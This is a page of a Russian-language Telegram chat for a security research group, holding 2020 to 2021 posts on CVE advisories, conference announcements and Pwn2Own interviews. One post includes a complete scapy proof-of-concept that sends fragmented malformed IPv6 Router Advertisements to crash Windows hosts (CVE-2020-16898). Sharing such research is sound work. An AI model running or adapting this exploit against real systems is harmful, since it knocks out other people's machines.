Телеграмм чат группы N0iSeBit страница 24

https://www.youtube.com/watch?v=m00um2MRqgE&ab_channel=Intercepter

Переслано от . .

📜ИСТОРИЯ СОЗДАНИЯ И РАЗВИТИЯ ПРОГРАММЫ Intercepter-NG | СОФТ | РАЗРАБОТКА📗

Как все начиналось, через какие этапы проходила разработка Intercepter'а, рассказываю и показываю!Twitter: https://twitter.com/IntercepterNGTelegram канал: h...

105021:59пожаловаться #1

2020 October 16

Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898)

CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability

https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html

http://blog.pi3.com.pl/?p=780

BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Quarkslab

192223:07пожаловаться #2

2020 October 23

Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)

Найдено несколько уязвимостей в Jitsi Meet:

- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)

https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/

NCC Group Research

200110:06пожаловаться #3

2020 October 31

EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400

PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104

192401:31пожаловаться #4

2020 December 11

Стали доступны слайды с прошедшей конференции Black Hat Europe 2020 https://www.blackhat.com/eu-20/briefings/schedule/

Blackhat

Black Hat Europe 2020

194412:53пожаловаться #5

2021 February 27

Видео докладов с Black Hat US 2020 доступны для просмотра онлайн! 🔥

https://www.youtube.com/playlist?list=PLH15HpR5qRsXE_4kOSy_SXwFkFQre4AV_

Black Hat USA 2020 - YouTube

129000:13пожаловаться #6

2021 March 03

Schedule, talks and talk submissions for ZeroNights 2021

CFP на юбилейную ZeroNights 2021 открыта! https://01x.cfp.zeronights.ru/zn2021/

01x.cfp.zeronights.ru

ZeroNights 2021

66802:06пожаловаться #7

2021 March 10

ZeroNights в поисках лучших докладов!

Мы ищем практиков и исследователей ИБ, готовых поделиться результатами своей работы в самых разных областях.

На ZeroNights 2021 вы можете выступить с 15-, 30- и 45-минутным докладом. А если представите эксклюзивное 45-минутное исследование в области Offensive Security, то получите денежное вознаграждение.

Подать заявку можно на сайте.

27622:28пожаловаться #8

2021 March 14

Проблема выбора 🤔🤑

Zerodium $250k за Exchange RCE
https://zerodium.com/program.html

Microsoft $0 ... $15k? ... $20k?
https://www.microsoft.com/en-us/msrc/bounty

44905:38пожаловаться #9

2021 March 23

Интересен был бы регулярный голосовой чат на нашем канале?

Окончательные результаты

53%

звучит интригующе 🍿

47%

что за дичь, в топку 🤦‍♂️

Проголосовало: 153

96700:00пожаловаться #10

2021 April 08

Exploit Hall of Fame: Mark Dowd
https://www.youtube.com/watch?v=dTL5y4Ib5Y8

Our interview with Mark Dowd for our Exploit Hall of Fame, on the PWN2OWN 2021 stream.

Hall of Fame: Mark Dowd

66007:23пожаловаться #11

2021 April 09

Интервью с Alisa Esage Шевченко
https://youtu.be/dA3aIMgRFY8

Join us for Pwn2Own 2021! This year, we are hosting the event in Austin, Toronto, and virtually with participants from around the globe. We kick everything o...

Pwn2Own 2021 - Day One Live Stream

205401:00пожаловаться #12

2021 April 10

Еще одно видео, которое рекомендую к просмотру 🔥

https://www.youtube.com/watch?v=fAPzR7VBmOo

EXPLOIT HALL OF FAME: The future of browser vulnerabilities

A conversation from our Exploit Hall of Fame about the future of browser exploits and mitigations. Includes Marco Ivaldi (0xdea), Ralf Philpp Weinman(@esizku...

52608:37пожаловаться #13

2021 April 22

Известны первые утвержденные доклады ZN 2021! Рассказываем о тех, которые войдут в основную программу.

1. Эксплуатация checkm8 с неизвестным SecureROM на примере чипа T2
Алексей Коврижных покажет продвинутый способ дампинга прошивки, который будет работать на устройствах с WXN, на примере T2.

2. LPE в Ring -3 / Intel ME
Дмитрий Турченков раскроет тайны эксплуатации багов в системном компоненте ME через механизм IPC.

3. Hacking KaiOS
Алексей Россовский расскажет о возможных векторах атак на KaiOS, включая сценарии удаленного выполнения кода, повышения привилегий и изучения новых уязвимостей.

Читать подробнее о докладах

36903:38пожаловаться #14

🤦‍♂️🙀

45308:02пожаловаться #15

2021 April 23

Юбилейные события отправляют нас к истокам. Когда-то в истории ZeroNights воркшопы были традиционными активностями, так почему бы нам не вернуть эту традицию и не включить их в программу?

Мы принимаем заявки на проведение практических воркшопов, где вы сможете поделиться своми идеями и наработками!

Подать заявку и задать вопросы по проведению вы можете по почте workshops@zeronights.org.

В письме укажите время продолжительности планируемого вами воркшопа и минимальные требования к месту проведения.

23716:02пожаловаться #16

2021 April 24

В возрасте 42-х лет ушел из жизни Dan Kaminsky, известный ресечер продемонстрировавший миру уязвимости в DNS и сети Интернет в целом. Твои исследования останутся в нашей памяти навсегда.

R.I.P. my friend!

41721:01пожаловаться #17

Phenoelit - Hacker Hacker

https://www.youtube.com/watch?v=IZYQILfxHiw

34721:11пожаловаться #18

2021 May 10

Сделать дешевый микроконтроллер безопасным довольно тяжело по многим причинам. Вот и Apple со своим AirTag тоже не осилил 😈

45207:30пожаловаться #19